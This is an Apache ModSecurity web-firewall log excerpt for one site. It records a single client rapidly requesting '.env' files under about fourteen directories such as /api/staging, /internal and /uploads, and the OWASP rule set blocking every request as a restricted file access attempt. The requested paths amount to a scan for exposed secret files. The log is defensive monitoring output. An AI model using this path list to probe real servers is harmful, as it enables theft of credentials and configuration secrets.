[Mon May 11 17:33:42.723843 2026] [security2:error] [pid 1412074:tid 1412087] [client 3.15.40.244:57404] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "30"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "habilis.space"] [uri "/gateway/.env"] [unique_id "agH21jJnyuKVXoStDhbNDwAAAEs"]
[Mon May 11 17:33:42.724066 2026] [security2:error] [pid 1412074:tid 1412087] [client 3.15.40.244:57404] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/RESPONSE-980-CORRELATION.conf"] [line "37"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): Restricted File Access Attempt"] [tag "event-correlation"] [hostname "habilis.space"] [uri "/403.shtml"] [unique_id "agH21jJnyuKVXoStDhbNDwAAAEs"]
[Mon May 11 17:33:42.838093 2026] [security2:error] [pid 1412074:tid 1412087] [client 3.15.40.244:57404] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "49"] [id "930130"] [rev "1"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /microservice/.env"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "7"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "habilis.space"] [uri "/microservice/.env"] [unique_id "agH21jJnyuKVXoStDhbNEQAAAEs"]
[Mon May 11 17:33:42.838330 2026] [security2:error] [pid 1412074:tid 1412087] [client 3.15.40.244:57404] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "30"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "habilis.space"] [uri "/microservice/.env"] [unique_id "agH21jJnyuKVXoStDhbNEQAAAEs"]
[Mon May 11 17:33:42.838564 2026] [security2:error] [pid 1412074:tid 1412087] [client 3.15.40.244:57404] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/RESPONSE-980-CORRELATION.conf"] [line "37"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): Restricted File Access Attempt"] [tag "event-correlation"] [hostname "habilis.space"] [uri "/403.shtml"] [unique_id "agH21jJnyuKVXoStDhbNEQAAAEs"]
[Mon May 11 17:33:42.954695 2026] [security2:error] [pid 1412074:tid 1412087] [client 3.15.40.244:57404] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "49"] [id "930130"] [rev "1"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /service/.env"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "7"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "habilis.space"] [uri "/service/.env"] [unique_id "agH21jJnyuKVXoStDhbNEgAAAEs"]
[Mon May 11 17:33:42.954925 2026] [security2:error] [pid 1412074:tid 1412087] [client 3.15.40.244:57404] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "30"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "habilis.space"] [uri "/service/.env"] [unique_id "agH21jJnyuKVXoStDhbNEgAAAEs"]
[Mon May 11 17:33:42.955133 2026] [security2:error] [pid 1412074:tid 1412087] [client 3.15.40.244:57404] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/RESPONSE-980-CORRELATION.conf"] [line "37"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): Restricted File Access Attempt"] [tag "event-correlation"] [hostname "habilis.space"] [uri "/403.shtml"] [unique_id "agH21jJnyuKVXoStDhbNEgAAAEs"]
[Mon May 11 17:33:43.081252 2026] [security2:error] [pid 1412074:tid 1412087] [client 3.15.40.244:57404] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "49"] [id "930130"] [rev "1"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /api/v3/.env"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "7"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "habilis.space"] [uri "/api/v3/.env"] [unique_id "agH21zJnyuKVXoStDhbNEwAAAEs"]
[Mon May 11 17:33:43.081477 2026] [security2:error] [pid 1412074:tid 1412087] [client 3.15.40.244:57404] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "30"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "habilis.space"] [uri "/api/v3/.env"] [unique_id "agH21zJnyuKVXoStDhbNEwAAAEs"]
[Mon May 11 17:33:43.081692 2026] [security2:error] [pid 1412074:tid 1412087] [client 3.15.40.244:57404] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/RESPONSE-980-CORRELATION.conf"] [line "37"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): Restricted File Access Attempt"] [tag "event-correlation"] [hostname "habilis.space"] [uri "/403.shtml"] [unique_id "agH21zJnyuKVXoStDhbNEwAAAEs"]
[Mon May 11 17:33:43.196757 2026] [security2:error] [pid 1412074:tid 1412087] [client 3.15.40.244:57404] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "49"] [id "930130"] [rev "1"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /api/dev/.env"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "7"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "habilis.space"] [uri "/api/dev/.env"] [unique_id "agH21zJnyuKVXoStDhbNFAAAAEs"]
[Mon May 11 17:33:43.196985 2026] [security2:error] [pid 1412074:tid 1412087] [client 3.15.40.244:57404] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "30"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "habilis.space"] [uri "/api/dev/.env"] [unique_id "agH21zJnyuKVXoStDhbNFAAAAEs"]
[Mon May 11 17:33:43.197200 2026] [security2:error] [pid 1412074:tid 1412087] [client 3.15.40.244:57404] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/RESPONSE-980-CORRELATION.conf"] [line "37"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): Restricted File Access Attempt"] [tag "event-correlation"] [hostname "habilis.space"] [uri "/403.shtml"] [unique_id "agH21zJnyuKVXoStDhbNFAAAAEs"]
[Mon May 11 17:33:43.314485 2026] [security2:error] [pid 1412074:tid 1412087] [client 3.15.40.244:57404] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "49"] [id "930130"] [rev "1"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /api/staging/.env"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "7"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "habilis.space"] [uri "/api/staging/.env"] [unique_id "agH21zJnyuKVXoStDhbNFQAAAEs"]
[Mon May 11 17:33:43.314712 2026] [security2:error] [pid 1412074:tid 1412087] [client 3.15.40.244:57404] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "30"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "habilis.space"] [uri "/api/staging/.env"] [unique_id "agH21zJnyuKVXoStDhbNFQAAAEs"]
[Mon May 11 17:33:43.314986 2026] [security2:error] [pid 1412074:tid 1412087] [client 3.15.40.244:57404] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/RESPONSE-980-CORRELATION.conf"] [line "37"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): Restricted File Access Attempt"] [tag "event-correlation"] [hostname "habilis.space"] [uri "/403.shtml"] [unique_id "agH21zJnyuKVXoStDhbNFQAAAEs"]
[Mon May 11 17:33:43.428905 2026] [security2:error] [pid 1412074:tid 1412087] [client 3.15.40.244:57404] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "49"] [id "930130"] [rev "1"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /vendor/.env"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "7"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "habilis.space"] [uri "/vendor/.env"] [unique_id "agH21zJnyuKVXoStDhbNFgAAAEs"]
[Mon May 11 17:33:43.429130 2026] [security2:error] [pid 1412074:tid 1412087] [client 3.15.40.244:57404] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "30"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "habilis.space"] [uri "/vendor/.env"] [unique_id "agH21zJnyuKVXoStDhbNFgAAAEs"]
[Mon May 11 17:33:43.429387 2026] [security2:error] [pid 1412074:tid 1412087] [client 3.15.40.244:57404] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/RESPONSE-980-CORRELATION.conf"] [line "37"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): Restricted File Access Attempt"] [tag "event-correlation"] [hostname "habilis.space"] [uri "/403.shtml"] [unique_id "agH21zJnyuKVXoStDhbNFgAAAEs"]
[Mon May 11 17:33:43.728653 2026] [security2:error] [pid 1412074:tid 1412087] [client 3.15.40.244:57404] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "49"] [id "930130"] [rev "1"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /lib/.env"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "7"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "habilis.space"] [uri "/lib/.env"] [unique_id "agH21zJnyuKVXoStDhbNFwAAAEs"]
[Mon May 11 17:33:43.728901 2026] [security2:error] [pid 1412074:tid 1412087] [client 3.15.40.244:57404] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "30"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "habilis.space"] [uri "/lib/.env"] [unique_id "agH21zJnyuKVXoStDhbNFwAAAEs"]
[Mon May 11 17:33:43.729135 2026] [security2:error] [pid 1412074:tid 1412087] [client 3.15.40.244:57404] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/RESPONSE-980-CORRELATION.conf"] [line "37"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): Restricted File Access Attempt"] [tag "event-correlation"] [hostname "habilis.space"] [uri "/403.shtml"] [unique_id "agH21zJnyuKVXoStDhbNFwAAAEs"]
[Mon May 11 17:33:43.843316 2026] [security2:error] [pid 1412074:tid 1412087] [client 3.15.40.244:57404] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "49"] [id "930130"] [rev "1"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /resources/.env"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "7"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "habilis.space"] [uri "/resources/.env"] [unique_id "agH21zJnyuKVXoStDhbNGAAAAEs"]
[Mon May 11 17:33:43.843536 2026] [security2:error] [pid 1412074:tid 1412087] [client 3.15.40.244:57404] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "30"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "habilis.space"] [uri "/resources/.env"] [unique_id "agH21zJnyuKVXoStDhbNGAAAAEs"]
[Mon May 11 17:33:43.843761 2026] [security2:error] [pid 1412074:tid 1412087] [client 3.15.40.244:57404] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/RESPONSE-980-CORRELATION.conf"] [line "37"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): Restricted File Access Attempt"] [tag "event-correlation"] [hostname "habilis.space"] [uri "/403.shtml"] [unique_id "agH21zJnyuKVXoStDhbNGAAAAEs"]
[Mon May 11 17:33:44.193383 2026] [security2:error] [pid 1411201:tid 1411261] [client 3.15.40.244:43530] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "49"] [id "930130"] [rev "1"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /assets/.env"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "7"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "habilis.space"] [uri "/assets/.env"] [unique_id "agH22Py_GXSWIKeli0sMEQAAAI8"]
[Mon May 11 17:33:44.193621 2026] [security2:error] [pid 1411201:tid 1411261] [client 3.15.40.244:43530] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "30"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "habilis.space"] [uri "/assets/.env"] [unique_id "agH22Py_GXSWIKeli0sMEQAAAI8"]
[Mon May 11 17:33:44.194577 2026] [security2:error] [pid 1411201:tid 1411261] [client 3.15.40.244:43530] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/RESPONSE-980-CORRELATION.conf"] [line "37"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): Restricted File Access Attempt"] [tag "event-correlation"] [hostname "habilis.space"] [uri "/403.shtml"] [unique_id "agH22Py_GXSWIKeli0sMEQAAAI8"]
[Mon May 11 17:33:44.305430 2026] [security2:error] [pid 1411201:tid 1411261] [client 3.15.40.244:43530] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "49"] [id "930130"] [rev "1"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /uploads/.env"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "7"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "habilis.space"] [uri "/uploads/.env"] [unique_id "agH22Py_GXSWIKeli0sMEgAAAI8"]
[Mon May 11 17:33:44.305656 2026] [security2:error] [pid 1411201:tid 1411261] [client 3.15.40.244:43530] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "30"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "habilis.space"] [uri "/uploads/.env"] [unique_id "agH22Py_GXSWIKeli0sMEgAAAI8"]
[Mon May 11 17:33:44.305900 2026] [security2:error] [pid 1411201:tid 1411261] [client 3.15.40.244:43530] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/RESPONSE-980-CORRELATION.conf"] [line "37"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): Restricted File Access Attempt"] [tag "event-correlation"] [hostname "habilis.space"] [uri "/403.shtml"] [unique_id "agH22Py_GXSWIKeli0sMEgAAAI8"]
[Mon May 11 17:33:44.419200 2026] [security2:error] [pid 1411201:tid 1411261] [client 3.15.40.244:43530] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "49"] [id "930130"] [rev "1"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /internal/.env"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "7"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "habilis.space"] [uri "/internal/.env"] [unique_id "agH22Py_GXSWIKeli0sMEwAAAI8"]
[Mon May 11 17:33:44.419426 2026] [security2:error] [pid 1411201:tid 1411261] [client 3.15.40.244:43530] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "30"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "habilis.space"] [uri "/internal/.env"] [unique_id "agH22Py_GXSWIKeli0sMEwAAAI8"]
[Mon May 11 17:33:44.419684 2026] [security2:error] [pid 1411201:tid 1411261] [client 3.15.40.244:43530] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/RESPONSE-980-CORRELATION.conf"] [line "37"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): Restricted File Access Attempt"] [tag "event-correlation"] [hostname "habilis.space"] [uri "/403.shtml"] [unique_id "agH22Py_GXSWIKeli0sMEwAAAI8"]
[Mon May 11 17:33:44.530835 2026] [security2:error] [pid 1411201:tid 1411261] [client 3.15.40.244:43530] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "49"] [id "930130"] [rev "1"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /tools/.env"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "7"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "habilis.space"] [uri "/tools/.env"] [unique_id "agH22Py_GXSWIKeli0sMFAAAAI8"]
[Mon May 11 17:33:44.531060 2026] [security2:error] [pid 1411201:tid 1411261] [client 3.15.40.244:43530] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "30"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "habilis.space"] [uri "/tools/.env"] [unique_id "agH22Py_GXSWIKeli0sMFAAAAI8"]
[Mon May 11 17:33:44.531305 2026] [security2:error] [pid 1411201:tid 1411261] [client 3.15.40.244:43530] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/RESPONSE-980-CORRELATION.conf"] [line "37"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): Restricted File Access Attempt"] [tag "event-correlation"] [hostname "habilis.space"] [uri "/403.shtml"] [unique_id "agH22Py_GXSWIKeli0sMFAAAAI8"]
[Mon May 11 17:33:44.649121 2026] [security2:error] [pid 1411201:tid 1411261] [client 3.15.40.244:43530] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "49"] [id "930130"] [rev "1"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /scripts/.env"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "7"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "habilis.space"] [uri "/scripts/.env"] [unique_id "agH22Py_GXSWIKeli0sMFQAAAI8"]
[Mon May 11 17:33:44.649350 2026] [security2:error] [pid 1411201:tid 1411261] [client 3.15.40.244:43530] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "30"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "habilis.space"] [uri "/scripts/.env"] [unique_id "agH22Py_GXSWIKeli0sMFQAAAI8"]
[Mon May 11 17:33:44.649574 2026] [security2:error] [pid 1411201:tid 1411261] [client 3.15.40.244:43530] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/RESPONSE-980-CORRELATION.conf"] [line "37"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): Restricted File Access Attempt"] [tag "event-correlation"] [hostname "habilis.space"] [uri "/403.shtml"] [unique_id "agH22Py_GXSWIKeli0sMFQAAAI8"]
